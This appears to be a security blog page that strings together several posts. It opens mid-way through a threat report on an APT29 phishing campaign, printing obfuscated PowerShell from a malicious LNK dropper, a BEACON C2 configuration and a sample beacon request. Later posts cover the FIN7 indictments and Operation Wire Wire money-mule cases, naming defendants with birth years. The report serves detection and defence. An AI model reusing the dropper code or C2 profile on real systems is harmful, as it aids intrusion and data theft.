$oufgke = 0x48bd8
$wabxu = 0x5e2be - $oufgke
$lblij = bygtqi $gibisec $oufgke $wabxu $("%TEMP%\ds7002.PDF") Invoke-Item
$((lylyvve @((7,(30 + 0x34 - 3),65,(84 - 5),(-38 + 112),(-16 + 0x25 + 52))) 35))
$oufgke = 0x0dd8
$wabxu = 0x48bd8 - $oufgke
$yhcgpw = bygtqi $gibisec $oufgke $wabxu $("%LOCALAPPDATA%\cyzfc.dat") if
($ENV:PROCESSOR_ARCHITECTURE -eq $("AMD64")) { & ($("rundll32.exe")) $(",")
$("PointFunctionCall") }

Files Dropped

Upon successful execution of the LNK file, it dropped the following files to the victim's system:

  • %APPDATA%\Local\cyzfc.dat (MD5: 16bbc967a8b6a365871a05c74a4f345b)
    • BEACON loader DLL
  • %TEMP%\ds7002.PDF (MD5: 313f4808aa2a2073005d219bc68971cd)
    • Decoy document

The dropped BEACON loader DLL was executed by RunDll32.exe using the export function "PointFunctionCall":

"C:\Windows\system32\rundll32.exe"
C:\Users\Administrator\AppData\Local\cyzfc.dat, PointFunctionCall

The BEACON payload included the following configuration:

authorization_id: 0x311168c
dns_sleep: 0
http_headers_c2_post_req:
  Accept: */*
  Content-Type: text/xml
  X-Requested-With: XMLHttpRequest
  Host: pandorasong.com
http_headers_c2_request:
  Accept: */*
  GetContentFeatures.DLNA.ORG: 1
  Host: pandorasong[.]com
  Cookie:  __utma=310066733.2884534440.1433201462.1403204372.1385202498.7;
jitter: 17
named_pipes: \\\\%s\\pipe\\msagent_%x
process_inject_targets:
  %windir%\\syswow64\\rundll32.exe
  %windir%\\sysnative\\rundll32.exe
beacon_interval: 300
c2:
  conntype: SSL
  host: pandorasong[.]com
  port: 443
c2_urls:
  pandorasong[.]com/radio/xmlrpc/v45
  pandorasong[.]com/access/
c2_user_agents: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko

Network Communications

After successful installation/initialization of the malware, it made the following callback to the C2 server pandorasong[.]com via TCP/443 SSL. The sample was configured to use a malleable C2 profile for its network communications. The specific profile used appears to be a modified version of the publicly available Pandora C2 profile. The profile may have been changed to bypass common detections for the publicly available malleable profiles. The following is a sample GET request:

GET /access/?version=4&lid=1582502724&token=ajlomeomnmeapoagcknffjaehikhmpep
Bdhmoefmcnoiohgkkaabfoncfninglnlbmnaahmhjjfnopdapdaholmanofaoodkiokobenhjd
Mjcmoagoimbahnlbdelchkffojeobfmnemdcoibocjgnjdkkbfeinlbnflaeiplendldlbhnhjmbg
agigjniphmemcbhmaibmfibjekfcimjlhnlamhicakfmcpljaeljhcpbmgblgnappmkpbcko
HTTP/1.1
Accept: */*
GetContentFeatures.DLNA.ORG: 1
Host: pandorasong.com
Cookie: __utma=310066733.2884534440.1433201462.1403204372.1385202498.7;
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like
Gecko
Connection: Keep-Alive
Cache-Control: no-cache

Similarities to Older Activity

Figure 5 and Figure 6 show the overlapping characteristics between the LNK used in the recent spear phish emails, ds7002.lnk (MD5: 6ed0020b0851fb71d5b0076f4ee95f3c), compared to a suspected APT29 LNK from the November 2016 attack that led to the SPIKERUSH backdoor, 37486-the-shocking-truth-about-election-rigging-in-america.rtf.lnk (MD5: f713d5df826c6051e65f995e57d6817d).


Figure 5: LNK characteristics: new activity (left) and old activity (right)


Figure 6: LNK characteristics: new activity (left) and old activity (right)

In addition to similar LNK characteristics, the PowerShell command is very similar to the code from the older sample that executed the SPIKERUSH backdoor. Some of the same variable names are retained in this new version, as seen in Figure 7 and Figure 8.


Figure 7: Embedded PowerShell: new activity (left) and old activity (right)


Figure 8: Shared string obfuscation logic: new LNK activity (left) and old VERNALDROP activity (right)

Indicators

Indicator

Description

dosonedrivenotifications-svct-mailboxe36625aaa85747214aa50342836a2315aaa36
928202aa46271691a8255aaa15382822aa25821925a
0245@northshorehealthgm[.]org

Phishing email address from likely compromised legitimate server

Stevenson, Susan N shared "TP18-DS7002 (UNCLASSIFIED)" with you

Phishing email subject

https://www.jmj[.]com/personal/nauerthn_state_gov/*

Malware hosting location on likely compromised legitimate domain

pandorasong[.]com

BEACON C2

95.216.59[.]92

Resolution of pandorasong[.]com

2b13b244aafe1ecace61ea1119a1b2ee

SSL certificate for pandorasong[.]com

3fccf531ff0ae6fedd7c586774b17a2d

Malicious ZIP archive MD5

658c6fe38f95995fa8dc8f6cfe41df7b

Benign ZIP archive MD5

6ed0020b0851fb71d5b0076f4ee95f3c

Malicious LNK file MD5

313f4808aa2a2073005d219bc68971cd

Benign decoy PDF MD5

16bbc967a8b6a365871a05c74a4f345b

BEACON DLL MD5

%APPDATA%\Local\cyzfc.dat

BEACON DLL file path

%TEMP%\ds7002.PDF

Benign decoy PDF file path

Table 2: Indicators

Related Samples

37486-the-shocking-truth-about-election-rigging-in-america.rtf.lnk (MD5: f713d5df826c6051e65f995e57d6817d)

FireEye Detection

FireEye detected this activity across our platform. Table 3 contains the specific detection names that applied to this activity.

Product

Detection names

Network Security

Malware.Archive
Malware.Binary.lnk
Suspicious.Backdoor.Beacon

Endpoint Security

SUSPICIOUS POWERSHELL USAGE (METHODOLOGY)
Generic.mg.16bbc967a8b6a365

Threat Analytics Platform

WINDOWS METHODOLOGY [PowerShell Base64 String]
WINDOWS METHODOLOGY [Rundll32 Roaming]
WINDOWS METHODOLOGY [PowerShell Script Block Warning]
WINDOWS METHODOLOGY [Base64 Char Args]
TADPOLE DOWNLOADER [Rundll Args]
INTEL HIT - IP [Structured Threat Reputation-Based]
INTEL HIT - FQDN [Structured Threat Reputation-Based] [DNS]
INTEL HIT - FQDN [Structured Threat Reputation-Based] [Non-DNS]
INTEL HIT - FILE HASH [Structured Threat Reputation-Based]

Table 3: FireEye product detections

Fin7 and the Perfect Phish

For the past twenty years, one of the main pieces of advice our industry gave to people regarding their email was "don't open attachments from people you don't know."  But what if your JOB is opening attachments from people you don't know?

On August 1st, the US Attorney for the Western District of Washington, Annette Hayes, and the FBI Seattle Special Agent in Charge, Jay Tabb, along with main Justice's head of the Computer Crimes and Intellectual Property Section (CCIPS), Deputy Attorney General Downing, gave a fascinating press conference about the FIN7 or Carbanak Group case.  (The link shows the 31 minute press conference on YouTube, where closed captioning is available.)

As AG Downing explained it, the FIN7 group would use a combination of emails and telephone calls to encourage people involved in catering or group reservations to open their malicious emails.  Imagine that your job is booking hotel rooms for group travel, or handling large catering deliveries for business meetings from your restaurant.  A new potential customer calls and says "I'd like to book forty hotel rooms for our sports team that is coming to play in a tournament in your town next month.  What email should I send the details to?"  Or "We're having an event at my office and need to order lunch for sixty people.  I know that I could use the online order form, but would you mind if I just sent you an email with the details?"  (I've done the latter myself when ordering FIFTY pizzas from Dominos!)

What sales person is NOT GOING TO OPEN THAT ATTACHMENT?  Right.  Every single one will do so!  Here's the flow of the attack that was shared at the Press Conference:

Depiction of one of the schemes used by cybercrime group FIN7.
(Image from FBI Seattle FBI Office)
Although the schemes I suggested sound complex, some of the emails shared during the press conference were quite simple:

Spear-phishing Email Image from justice.gov

Spear-phishing Email Image from justice.gov


Three criminals were arrested in this scheme, each on their own indictment.  The first two were actually arrested in January 2018, but their arrest and information about their case remained secret as law enforcement continued to hunt for additional members of the FIN7 team.

Also appearing at the press conference were representatives from Visa and Master Card. Marie Russo, SVP of Cards and Franchise at MasterCard.  Marie praised their participation in the NCFTA (the National Cyber Forensics Training Alliance) who offers a service that helps send stolen credit card information to the . Dan Schott, Senior Director of Visa. Both Ms. Russo and Mr. Schott talked about their proactive means of identifying crime trends and coordinated with banks.  Mr. Schott reminded that every Visa card service in the United States offers "Transaction Alerts" that will notify you when your card is used in a transaction. (Unfortunately Schott also quoted the mythical $600 Billion annual cost of cybercrime.)  

Is This Joker's Stash?

We don't know.  Although many of the victim companies have been anonymized, the indictment does reveal that "Victim-1" was the Emerald Queen Hotel and Casino (EQC) in Pierce County, Washington, "Victim-3" was Chipotle Mexican Grill, Victim-5 was the Boeing Employee Credit Union, Victim-6 was Jason's Deli, Victim-8 was Red Robin Gourmet Burgers and Brews, Victim-9 was Sonic Drive-in, and Victim-10 was Taco John's.  Trend Micro has previously published that FIN7 was also involved in breaches at Trump Hotels, Whole Foods, Saks Fifth Avenue and Lord & Taylor.  That latter group of cards is known to have been trafficked on the criminal card market "Joker's Stash", and TrendMicro actually equates the groups.  Their April 2, 2018 press release, "Bank Card Data of Five Million Stolen in Saks and Lord & Taylor Data Breach," begins with the sentence:  "A hacking syndicate known as JokerStash (also identified as Fin7 and Carbanak) announced the sale of five million payment cards on the dark web last March 28.

Trend Micro (click for full article)
Brian Krebs was one of the journalists who has written extensively about Joker's Stash.  In this image from his blog post "Will the Real Joker's Stash Come Forward", he shares an image of the card "base" "FIRETIGERRR" associated with the Sonic Drive-In databreach, showing a screenshot of the September 26, 2017 announcement on Joker's Stash about the availability of 5 million credit cards:

Image result for joker's stash carbanka
Sonic Drive-In cards being sold on Joker's Stash (image from krebsonsecurity.com)

The indictments do not make the ties between FIN7 and Joker's Stash quite so strongly.  For example, in the Hladyr indictment:

"between approximately March 24, 2017 and April 18, 2017, FIN7 harvested payment data from point-of-sale devices at certain Victim-3 restaurant locations.  FIN7 stole millions of payment card numbers, many of which have been offered for sale through vending sites, including but not limited to, Joker's Stash, thereby attempting to generate millions of dollars of illicit profits.

Three Ukrainian mastermind arrested

Three Ukrainians, Fedor Gladyr (age 33), Andrey Kolpakov (age 30), and Dmytro Fedorov (age 44) were arrested in the current round of actions, although prosecutors made it clear that there will be more arrests in the future.  They also make clear that the top leader of this scheme  has not yet been arrested.

Fedorov is said to have been the first to be arrested, in January 2018, in Poland.  A KyivPost article in February about a 44-year old Ukrainian hacker being detained in Poland on an Interpol warrant is certainly about him ==> "Ukrainian Hacker detained, Faces 30 years in Prison."  

It is unknown how or if this is related to the Spanish Police arrest of "Dennis-K" said at the time to be the leader of the Carbanak Group when he was arrested on March 26, 2018 in Alacante, Spain.  (A YouTube video about that arrest (in Spanish) is available as "Detenido hacker 1000 millones (Denis-K)"  The Times of London called Denis-K a 30-year old Russian-born Ukrainian citizen, living in Spain, whose malware used in cyber attacks in more than 40 countries, and who owned two million dollar houses.  At the time, Europol said this was the end of a 5-year cybercrime spree that had stolen $1.2 Billion. This does NOT seem to be the same person, despite the age match and the "K" last name, as the US case states that Kolpakov was arrested in "late June" in Lepe, Spain.

It is also unknown how or if this is related to the Ukrainian Police's arrest of members of the COBALT game earlier this year.  Europol says that COBALT and CARBANAK are the same group.  It is believed by this author that the current FBI action in Seattle is targeting CUSTOMERS of the malware author group known as Cobalt/Carbanak.  Hopefully this will get sorted out in the near future.  

(Related stories:  


The superseding indictment of Fedor Gladyr
Fedor Gladyr, aka das, aka Fyodor, aka AronaXus, "served as a high-level systems administrator for FIN7 who maintained servers and communications channels used by the organization.  For example, FIN7 members requested Gladyr grant them access to servers used by FIN7 to facilitate the malware scheme.  He also played a management role in the scheme by delegating tasks and by providing instruction to other members of the scheme.  Gladyr used Jabber and HipChat to communicate with his teams.  The team used a JIRA server, usually used to track long software development projects, to communicate about the infiltration of their victims. As a few examples:

07SEP2016 - Gladyr opens an "issue" for Victim-6 for his conspirators to upload files of internal credentials for the company network.
JAN2017 - Dmytro Fedorov opens an "issue" for Victim-7 credentials to be posted.
05APR2017 - Fedorov opens an "issue" for Victim-9 credentials to be posted.

Some of the malicious infiltration of the victim networks came by emailing those malware-laden requests for quotes to companies.  Some examples include:

08AUG2016 - Victim-1, email from just_etravel@yahoo.com
08AUG2016 - Victim-1, email from frankjohnson@revital-travel.com
25AUG2016 - Victim-6, email from revital.travel@yahoo.com 
21&23FEB2017 - Victim-2 two emails
24-25MAR2017 - Victim-3 six emails 
05APR2017 - Victim-9 emails from oliver_palmer@yahoo.com 
11APR2017 - Victim-4 email from oliver_palmer@yahoo.com 
10MAR2017 - Victim-5 email 
27MAR2017 - Victim-8 email from ray.donovan84@yahoo.com 
25MAY2017 - Victim-4 email from Adrian.1987clark@yahoo.com (Subject: "takeout order")
12JUN2017 - Victim-10 email from Adrian.1987clark@yahoo.com (Attachment: order.catering.rtf)

In the case of Victim-1, firewall logs indicate that between August 8,  2016 and August 31, 2016, there were at least 3,639 communications between their organization and "revital-travel.com" addresses hosted on an IP address in Russia.

Not all of the emails were the "customer wanting a quote" type.  On 21FEB2017, pen-testers working for the scheme sent emails purporting to be filings@sec.gov to Victim-2.  The email contained a Microsoft Word attachment and alleged that an important filing was due and that the details for the filing were in the attached document.

Sometimes the stolen information targeted not only the business accounts, but also the personal information of the victims.  One FIN7 member posted a Victim-2 employee's information to their JIRA server, showing screenshots from the employee's computer and including a text file with userids and passwords of their personal email account, LinkedIn account, and personal investment and banking accounts.

Once inside an organization, it was trivial for the FIN7 "pen-testers" to expand.  Some documents posted in JIRA included userids and passwords for more than 1,000 employees, and in the case of Victim 3, point-of-sale malware was planted on many cash register computers nationwide, including 33 locations just in the Western District of Washington.

Victim-8 had an associated JIRA "issue" posted that included screenshots and usernames and passwords for the point-of-sale software management solution used by their restaurant chain.   Hundreds of userids and passwords for employees in at least 798 different locations were also stolen from Victim-8 and posted in the JIRA server.

Kolpakov indictment
Andrey Kolpakov, aka santisimo, aka sanisimoz, aka AndreyKS, participated in the scheme from at least September 2015 until June 20, 2018.  In communications to and from Kolpakov, someone in the group referred to Fedir Hladyr and an individual still at large were the "main directors" of the group.  That other individual was also called the "chief manager" of the team.  Kolpakov was introduced to new recruits to the team as their supervisor.  Kolpakov and Dmytro Fedorov had discussions about how to trigger the phishing emails, and which file types would be most effective.  Kolpokov explained to Fedorov on 18SEP2017 that they now had a means to deploy a malware file without requiring the recipient to double-click on it.  Kolpakov's account on the JIRA server was frequently the one that uploaded stolen data in response to the "issues" created by Gladyr.  Many of the uploads mentioned in the Kolpakov indictment are about the particulars of exfiltrated files from password management systems, infrastructure management systems, and in one case an "employee only" web page that the team had altered to gather passwords. Team members regularly communicated on the JIRA server about recommendations for attack vectors to be used against targeted infrastructure.


Dmytro Fedorov Indictment
Dmytro Fedorov's account on the JIRA server was involved in technical exploitation details.  For example, in response to an "issue" created for Victim-7,  Fedorov posted the results of data created by network mapping tools, including IP addresses and network, that helped to explain to the team what addresses should be targeted for further exploitation.

According to his indictment, Fedorov "served as a high-level pen-tester (one tasked with finding vulnerabilities that an attacker may exploit) who managed other pen-testers responsible for breaching the security of victims' computer systems. He specifically created and managed "issues" on the FIN7 JIRA server related to intrusions of multiple companies, including Victim-7 (an automotive retail and repair chain) and Victim-9 (Sonic Drive-Ins).
Fedorov's communications on Jabber seem to indicate that he was controlling the data exfiltration panels associated with malware planted on victim company computers and point-of-sale terminals.  

Combi Security 

Although the current indictments only name ten victim companies, the documentation presented by the US Attorney's office makes it clear that more than 100 companies were attacked by FIN7 hackers working for Combi Security.

FIN7 Attacked at least 3600 locations of 100+ US businesses
If you wanted to have a team of the best hackers available, one option is recruiting people from the dark corners of the Internet, whose names and locations you may not know, and who may have been involved in every sort of trouble.  The other option would be to stand up a cyber security company with offices in Moscow and Haifa, Israel, and advertise for the best trained White Hat hackers to come work for your Penetration Testing (Pen-Testing) team.  FIN7 did the latter.  Using hackers who applied in their real name, showed credentials and certifications, and were in some cases formerly the employees of their respective governments, Combi Security told their hackers that they had been hired to hack various companies, and then those hackers got to work penetrating systems.

Job ads found on a Ukrainian job board indicate that Combi Security had between 21-80 employees.

https://jobs.dou.ua/companies/combi-security/
Google-translation of the ad:

Combi Security is one of the leading international companies in the field of information security. Its headquarters are located in Moscow and Haifa.
We are a team of leading professionals in the field of information security for various organizations working around the world.Our main specialization is a comprehensive audit of projects of any complexity, the supply of software and hardware.
Our main mission is to ensure the security of your activities, minimize the risks of using information technology. Every appeal to us for help is considered with the utmost thoroughness on an individual basis, offering an optimal solution within the framework of the tasks set and the specific needs expressed.
CombiSecurity.com offered their website in Russian, English, and Hebrew:

Their "Contacts" page listed three addresses and telephone numbers:


  • Moscow , Presnenskaya naberezhnaya, 10, block C, tel. +7 (495) 3083827
  • Haifa , 15-A Palyam St. (36 HaAtzmaut St) tel. +9 (724) 6328732
  • Odessa , ul.Uspenskaya, 65 of office 23, 65011 phone. + 38 (048) 7002409
What services did they claim to provide?  Below is their "The Services" page (Google-translated to English), retrieved from Archive.org's Wayback machine entry for CombiSecurity.com:

The services

A qualitatively working security service guarantees an indispensable stability in the operation of your technologies.
Thanks to the active assistance of our technical experts, all the irregularities in the operation of your devices will certainly be detected, analyzed and eliminated. With our professional support, the disrupted monitoring of the security system will turn into a stable process, managed in accordance with established principles and rules.
We provide services:
Penetration test (Pentest)
  • Technological penetration test.
    This penetration test is conducted to identify existing vulnerabilities in the elements of the IT infrastructure, practical demonstration of the possibility of using vulnerabilities (by the example of the most critical ones) and the formation of recommendations for the removal of identified vulnerabilities.
    A penetration test can be conducted for the perimeter of the corporate network (external test) and for internal resources (internal test). Work can be conducted with notification to administrators and users of the system under test, or without it. During internal testing, both the auditor's laptop and the customer's standard workplace can be used.
    In the testing process, both tools and manual analysis methods are used.
  • Socio-technical penetration test.
    This penetration test is conducted using social engineering techniques. The main purpose of the test is to identify the level of awareness of the Customer's personnel about the requirements for information security. In the process of testing, the response of users and personnel responsible for information security to the organizational methods of penetration used by attackers is determined.
    Methods of social engineering are often used by intruders and are directed, as a rule, to end users. As a result of a successful attack, an attacker can gain control over workstations, obtain confidential Customer documents, use the Customer's resources to organize attacks on the systems of other companies, send out spam, etc.
    The organizational aspects of information security are an important part of the protection system and, often, ordinary users are the weakest link. The given service will allow to reveal those organizational aspects of information security, on which the Customer should pay attention first of all.
    The results obtained during the provision of this service can form the basis for the development of the Security Awareness Program, which is maximally focused on the problem areas identified during the testing. This service can also be useful for checking the effectiveness of the current Customer Awareness Program.
  • Integrated penetration test.
    Complex penetration test is closest to the real actions of intruders. Using various technical and socio-engineering methods, auditors try to bypass existing protective mechanisms in order to fulfill the tasks set by the Customer (increasing privileges, gaining access to confidential information, modifying data from DBMS, etc.).
    During testing, the approaches described in the sections "Technological penetration test" and "Sociotechnical penetration test" are used, and the security of the customer's wireless networks is assessed.
The result of the work will be a report containing :
  • Methods of testing.
  • Conclusions for management, containing an overall assessment of the level of security.
  • Description of the identified deficiencies of the ISMS.
  • Description of the testing process with information on all identified vulnerabilities and the results of their operation.
  • Recommendations for the elimination of identified vulnerabilities.
Controlling the level of security
Due to the rapid detection of vulnerabilities and the introduction of changes to the network infrastructure, the results of a one-time verification of the level of security of the corporate network quickly lose their relevance. The need for new inspections arises after several months, and in companies with a dynamically developing IT infrastructure and a large-scale representation on the Internet, this period can be weeks or even days.
The emergence of new vulnerabilities, the change in the structure of the network perimeter, the modification of the settings of servers, network equipment and security equipment, all this requires in-depth analysis on the effect on the resistance to external unauthorized influences.
In this regard, Combi Security Company offers to your attention services aimed at constant monitoring of the state of information security. These include:

  • Monitoring the perimeter security of the corporate network
  • Designing and implementing a security management system
  • Development of corporate security policy
Evaluation of the level of security
Penetration testing works are aimed at overcoming existing protective mechanisms, but not at a deep assessment of the level of security of a specific information system or technology. The penetration approach of the black box analysis often prevents the auditor from detecting some vulnerabilities that are easily detected by other methods, for example, by analyzing firewall settings.
The work to assess the level of security is aimed at a deep assessment of one or another aspect of information security, or a comprehensive analysis of the entire ISMS in general.
Combi Security offers the following services to assess the level of security of various aspects of information security:

  • Integrated audit of information security
  • Assessing the security of Web applications
  • Analysis of application security on mobile platforms
  • Assessing the security of wireless networks
  • The effectiveness of the awareness-raising program in the field of information security
 Raising awareness of users
 Preparing for audit in accordance with international standards, for example ISO 27001
Consultations of experts in the field of it- security.
In addition to these services, sometimes there is a need for solving non-standard tasks. If you did not find something that will help you solve the problem before you, you can contact the experts of Combi Security. Perhaps our specialists have already dealt with similar problems.
Our company offers only those services that we can really carry out with very high quality, services where we can fully utilize the rich practical experience of our specialists.

Operation Wire Wire: the South Florida Cases Part 3

In the main DOJ Operation Wire Wire press release, the South Florida cases are described like this:

  • Following an investigation by the FBI and the U.S. Secret Service, 23 individuals were charged in the Southern District of Florida with laundering at least $10 million from proceeds of BEC scams, including eight people charged in an indictment unsealed last week in Miami. These eight defendants are alleged to have conspired to launder proceeds from numerous BEC scams, totaling at least approximately $5 million, including approximately $1.4 million from a victim corporation in Seattle, as well as various title companies and a law firm.
In Part 1 we reviewed 17-CR-20748, the case against Destiny Asjee Rowland, Lourdes Washington, and Cynthia Rodriguez.  (See Operation Wire Wire: The South Florida Cases, Part 1 )

In Part 2 we reviewed 18-CR-20170, the case against Eliot Pereira, Natalie Armona, Melissa Rios, Bryant Ortega, Angelo Santa Cruz, Alexis Fernandez Cruz, Roberto Carlos Gracia, Jose E. Rivera, Angeles De Jesus Angulo, Jennifer Ruiz, Yirielkys Pacheco Fernandez, and Sebastian Loayz.  (See Operation Wire Wire: The South Florida Cases, Part 2

Part 3 in our blog series focuses on those "eight people charged in an indictment unsealed last week in Miami", which refers to case 18-CR-20415, the case against Gustavo Gomez, Selene Joya, Jaremy Lucia Mena, Jose Brito Garcia, Jessica Hyde, Hillary Lee Williams, Juan Frias, and Ariel Champaign Edwards.

What links all of these cases together is that in each case, the ring leaders were recruited into their scam by the same individual: Roda Taher, who will be the focus of our next blog post "Operation Wire Wire: Who is Roda Taher?" 

The indictment begins with the statement:

"Roda Taher, aka Ressi, aka Rezi, hereinafter Taher, was the manager and supervisor of a criminal organization that engaged in money laundering by utilizing money mules and recruiters in the Southern District of Floirda, in other place in the United States, and in foreign commerce."

It then introduces our cast of characters.  As in South Florida case 1 and case 2, each of the players is recruited and instructed to set up a shell company, incorporating it in Florida, and establishing corresponding bank accounts with which to receive the proceeds of various Business Email Compromise and Spear Phishing attacks which fool company employees into wiring funds or transferring them via ACH, into the shell company accounts.

Defendant #1: Gustavo Gomez, b.1985, incorporated AG Universal Links in Hollywood, Florida.
Defendant #2: Selene Joya, b. 1990, incorporated Joya Star Life, Inc. in Miami Gardens, Florida.
Defendant #3: Jaremy Lucia Mena, b. 1992, incorporated Jaremy International, Inc. in North Miami, Florida.
Defendant #4: Jose Brito Garcia, b. 1981, incorporated Brito Commercial Products, Inc. in Hollywood, Florida.
Defendant #5: Jessica "Chuchi" Hyde, b.1987, incorporated Hyde Quality Inc. in Cutler Bay, Florida.
Defendant #6: Hillary Lee Williams, b. 1992, incorporated H Lee W Trade Group Inc. in Miami, Florida.
Defendant #7: Juan Frias, b. 1985, incorporated Ocean Surplus, Inc. in Miami, Florida.
Defendant #8: Ariel Champaign Edwards, b. 1991, incorporated Ariel Prime Trades Inc. in Miami, Florida.

Gustao Gomez worked closely with Roda Taher and other recruiters to recruit money mules and coach them in the manner in which they should set up their bank accounts.  According to the indictment:

"The recruiters would instruct money mules to open bank accounts in the name of their shell companies at various banks in the Southern District of Florida and elsewhere, and to falsely tell bank representatives that their shell company was a legitimate business engaged in the sale, import, or export of goods.  Taher and his recruiters gave different money mules a variety of false and fraudulent explanations regarding the nature of their businesses, including the sale, export, or import of textiles, furniture, electronics, or other goods.  However, the shell companies would not conduct any legitimate business."

"Once a money mule had opened a shell bank account in his or her shell company's name, those accounts would receive wire transfers of the proceeds of various fraudulent schemes.  The fraudulent schemes included, primarily, but were not limited to, email hacking or spoofing, also known as business email compromise and spearphishing scams.  Co-conspirators would hack into a victim's email account or otherwise take over that account without permission.  In a variation of this scheme, co-conspirators would "spoof" or create a fraudulent email account that was made to look like a victim's real email account.  The co-conspirators would then send email messages via the hacked or spoofed email accounts to individuals or corporations, instructing them to wire large sums of money to the money mules' shell bank accounts."

Roda Taher and the other recruiters would notify the mules when funds would be arriving into their accounts. These communications were primarily via the mobile phone encrypted messaging service WhatsApp.  They would be given instructions on what amounts would be received, where to wire the funds, and what commissions they were allowed to withdraw.  The commissions would be split with their recruiter, while the wires often sent the bulk of the money to China, Poland, and other destinations.

When banks closed the accounts, Taher would instruct the mules to open additional accounts at other banks.  Top performing mules were invited to become recruiters by inviting others to join the scheme as mules.  Recruiters received a percentage of the proceeds from the work of each mule they recruited.

The transactions particularly mentioned in the indictment are listed here. 

CountDateDefendantTransaction
202JUL2014Gustavo Gomez$48,500 from AG Universal Links' Wells Fargo Bank account to Sonish Enterprises FZE in Dubai, UAE
318JUL2014Gustavo Gomez$192,000 from AG Universal Links' Wells Fargo Bank account to Sonish Enterprises FZE in Dubai, UAE
419JUL2014Gustavo Gomez$4,500 from AG Universal Links' Wells Fargo Bank account to Zion Luxury Car Rental Inc.
501AUG2016Selene Joya$8,600 from Joya Star Life Inc's Bank of America Account
601AUG2016Selene Joya$5,500 from Joya Star Life Inc's Bank of America Account
701AUG2016Selene Joya$4,000 from Joya Star Life Inc's Bank of America Account
826JAN2017Jaremy Lucia Mena$78,902 from Jaremy International Inc's TD Bank account to Bella Tyre Co Ltd in China
926JAN2017Jaremy Lucia Mena$9,400 from Jaremy International Inc's TD Bank account
1013FEB2017Jose Brito Garcia$37,904 from Brito Commercial Products Inc's TD Bank account to Huge Elite Limited in Shanghai, China(*)
1117MAY2017Hillary Lee Williams$79,980 from H Lee W Trade Group's SunTrust Bank account to Redington Gulf FZE in Dubai, UAE
1206SEP2017Juan Frias$59,700 from Ocean Surplus Inc's TD Bank account to Zhejiang Oudi Machine Co. Ltd. in Zhejiang, China
1302NOV2017Ariel Champaign Edwards$8,200 from Ariel Prime Trade Inc's Wells Fargo account
1421NOV2017Ariel Champaign Edwards$700 from Ariel Prime Trade's Bank of America account

* - Worth noting that "Huge Elite Limited" in Shanghai, China was also the recipient of ill-gotten gains from Bryant Ortega in "Part 2."

This case is much "fresher" than some of the others.  The first arraignment in the case being Gustavo Gomez's appearance on May 31, 2018.  Gustavo just bonded out on June 11, 2018, for $50,000 posted by his girlfriend's brother.

Operation Wire Wire: the South Florida Cases Part 2

The Second South Florida case is linked to the first because this entire conspiracy also is part of the work of Roda Taher, AKA Ressi, AKA Rezi, the top recruiter in the first case.  However, in this 30 count indictment, the only one NOT named is Roda Taher.

Rezi recruited Eliot Pereira and Melissa Rios, below, who each in turn recruited others.




Defendant #1:  Eliot Pereira, b.1993 - opened "Eliot Products & Arts, Inc." and recruited and managed mules.
Defendant #2: Natalie Armona - opened "Armona Furniture Design Concept & Textile" and recruited and managed multiple mules and recruiters, including defendants #5, #8, #9, #10, and #12.
Defendant #3: Melissa Rios, b. 1996 - opened "Taihan Fiberoptics, Inc." and recruited #2
Defendant #4: Bryant Ortega, b. 1996 - opened "Bryant Tech Deals" and recruited and managed multiple mules, including Defendant #7. (4631 West 9th Court, Hialeah, FL 33012)
Defendant #5: Angelo Santa Cruz, b. 1994 - opened "ASC Worldwide, Inc" and recruited and managed multiple mules, including Defendants #6 & #11.
Defendant #6: Alexis Fernandez Cruz, b. 1992 - opened "Alexis Universal, Inc."
Defendant #7: Roberto Carlos Gracia, b. 1994 - opened RCG Deals, Inc.
Defendant #8: Jose E. Rivera, b. 1989 - opened Rivera Worldwide, Inc.
Defendant #9: Angeles De Jesus Angulo, b. 1996 - opened Angeles Premier Trades, Inc.
Defendant #10: Jennifer Ruiz, b. 1994 - opened Josette Quality, Inc.
Defendant #11: Yirielkys Pacheco Fernandez, b. 1984 - opened YF Nationwide, Inc.
Defendant #12: Sebastian Loayza, b. 1994 - opened Sure Trades, Inc.

This case starts off with a criminal complaint from the Miami office of the United States Secret Service.

It begins with his overview of the case, which is worth quoting here:

"Federal law enforcement agents have been investigating numerous business email compromise and spear phishing scams wherein various fraudsters targeted employees with access to company finances and tricked them into making wire transfers to bank accounts thought to belong to trusted partners -- except in fact, the accounts were shell companies controlled by the fraudsters.

Different people played different roles in the scheme.  Some of the co-conspirators hacked into and took control over certain victim companies' business email accounts without the knowledge or consent of the true email account holders, or created email accounts similar to, but slightly different from, real business email accounts.  Using the sham or compromised email accounts, the fraudsters then sent emails soliciting payments, claiming that funds were owed, and representing that payments for services rendered by the victim companies should be redirected to different accounts.

Other co-conspirators, known as money mules, opened shell companies and bank accounts into which the funds were fraudulently transferred, and then withdrew the fraud proceeds in cash, or wired the fraud proceeds into their foreign and domestic bank accounts.  Several money mules progressed to recruiting and managing other mules."

Natalie Armona may have been a good choice for Melissa to recruit based on her work.  Here's a Facebook post of hers from last year!  But by the dates, she had been in the money mule business quite a while before landing this job as a Junior Processor at a lending firm.


Armona's TD Bank account 

The complaint begins by telling the story of Natalie ARMONA, who opened a business, Armona Furniture Design Concept & Textile Inc., incorporating the business in Florida using her home address and opening a business checking account at TD Bank.  She was the sole signatory, and used her true social security number on the account.  The account was opened on December 9, 2106 and received its first wire December 14, 2016, from a scammed medical center (Victim Company A).  After taking out her commission in cash ($5,500) using her true Florida drivers license number as identity confirmation, Armona wired the rest of the money to "Flame Land International Limited" in Hong Kong.

On December 21, 2016, Armona's TD Bank account received an ACH for $724,395. Armona again paid herself first, withdrawing $10,508 in person.  Three wires went out.  $288,301 to "Caplan Sp Zoo" in Warszawa, Poland.  $194,110 to the same.  $94,218 to "Baolifeng Intl Trading Limited" in Shenzhen, China.  Armona paid herself twice more, once for $5,500 and once for $9400.  On December 27, 2016, she dipped three more times, for $800, $3800, and $9900.

Armona's SunTrust Bank account 

On December 9, 2016, Armona Furniture opened a SunTrust Bank account.  On December 30th she got an inbound ACH of $35,170 from a Pennsylvania sign company.  Also on December 30th, she got an incoming wire from Kukutula Development Company LLC in Koloa, Hawaii in the amount of $59,850.  On January 3, 2017, Armona withdrew $35,170.  On January 13, 2017, SunTrust closed the account for fraud with a balance of $59,850.

ASC WorldWide

A collaborating witness told the Miami Electronic Crimes Task Force that he had been recruited by Armona and had opened a shell company in the name ASC WorldWide, with accounts at TD Bank and Suntrust Bank.  Among other activities, he used email-based scams to cause $80,000 to be wired.

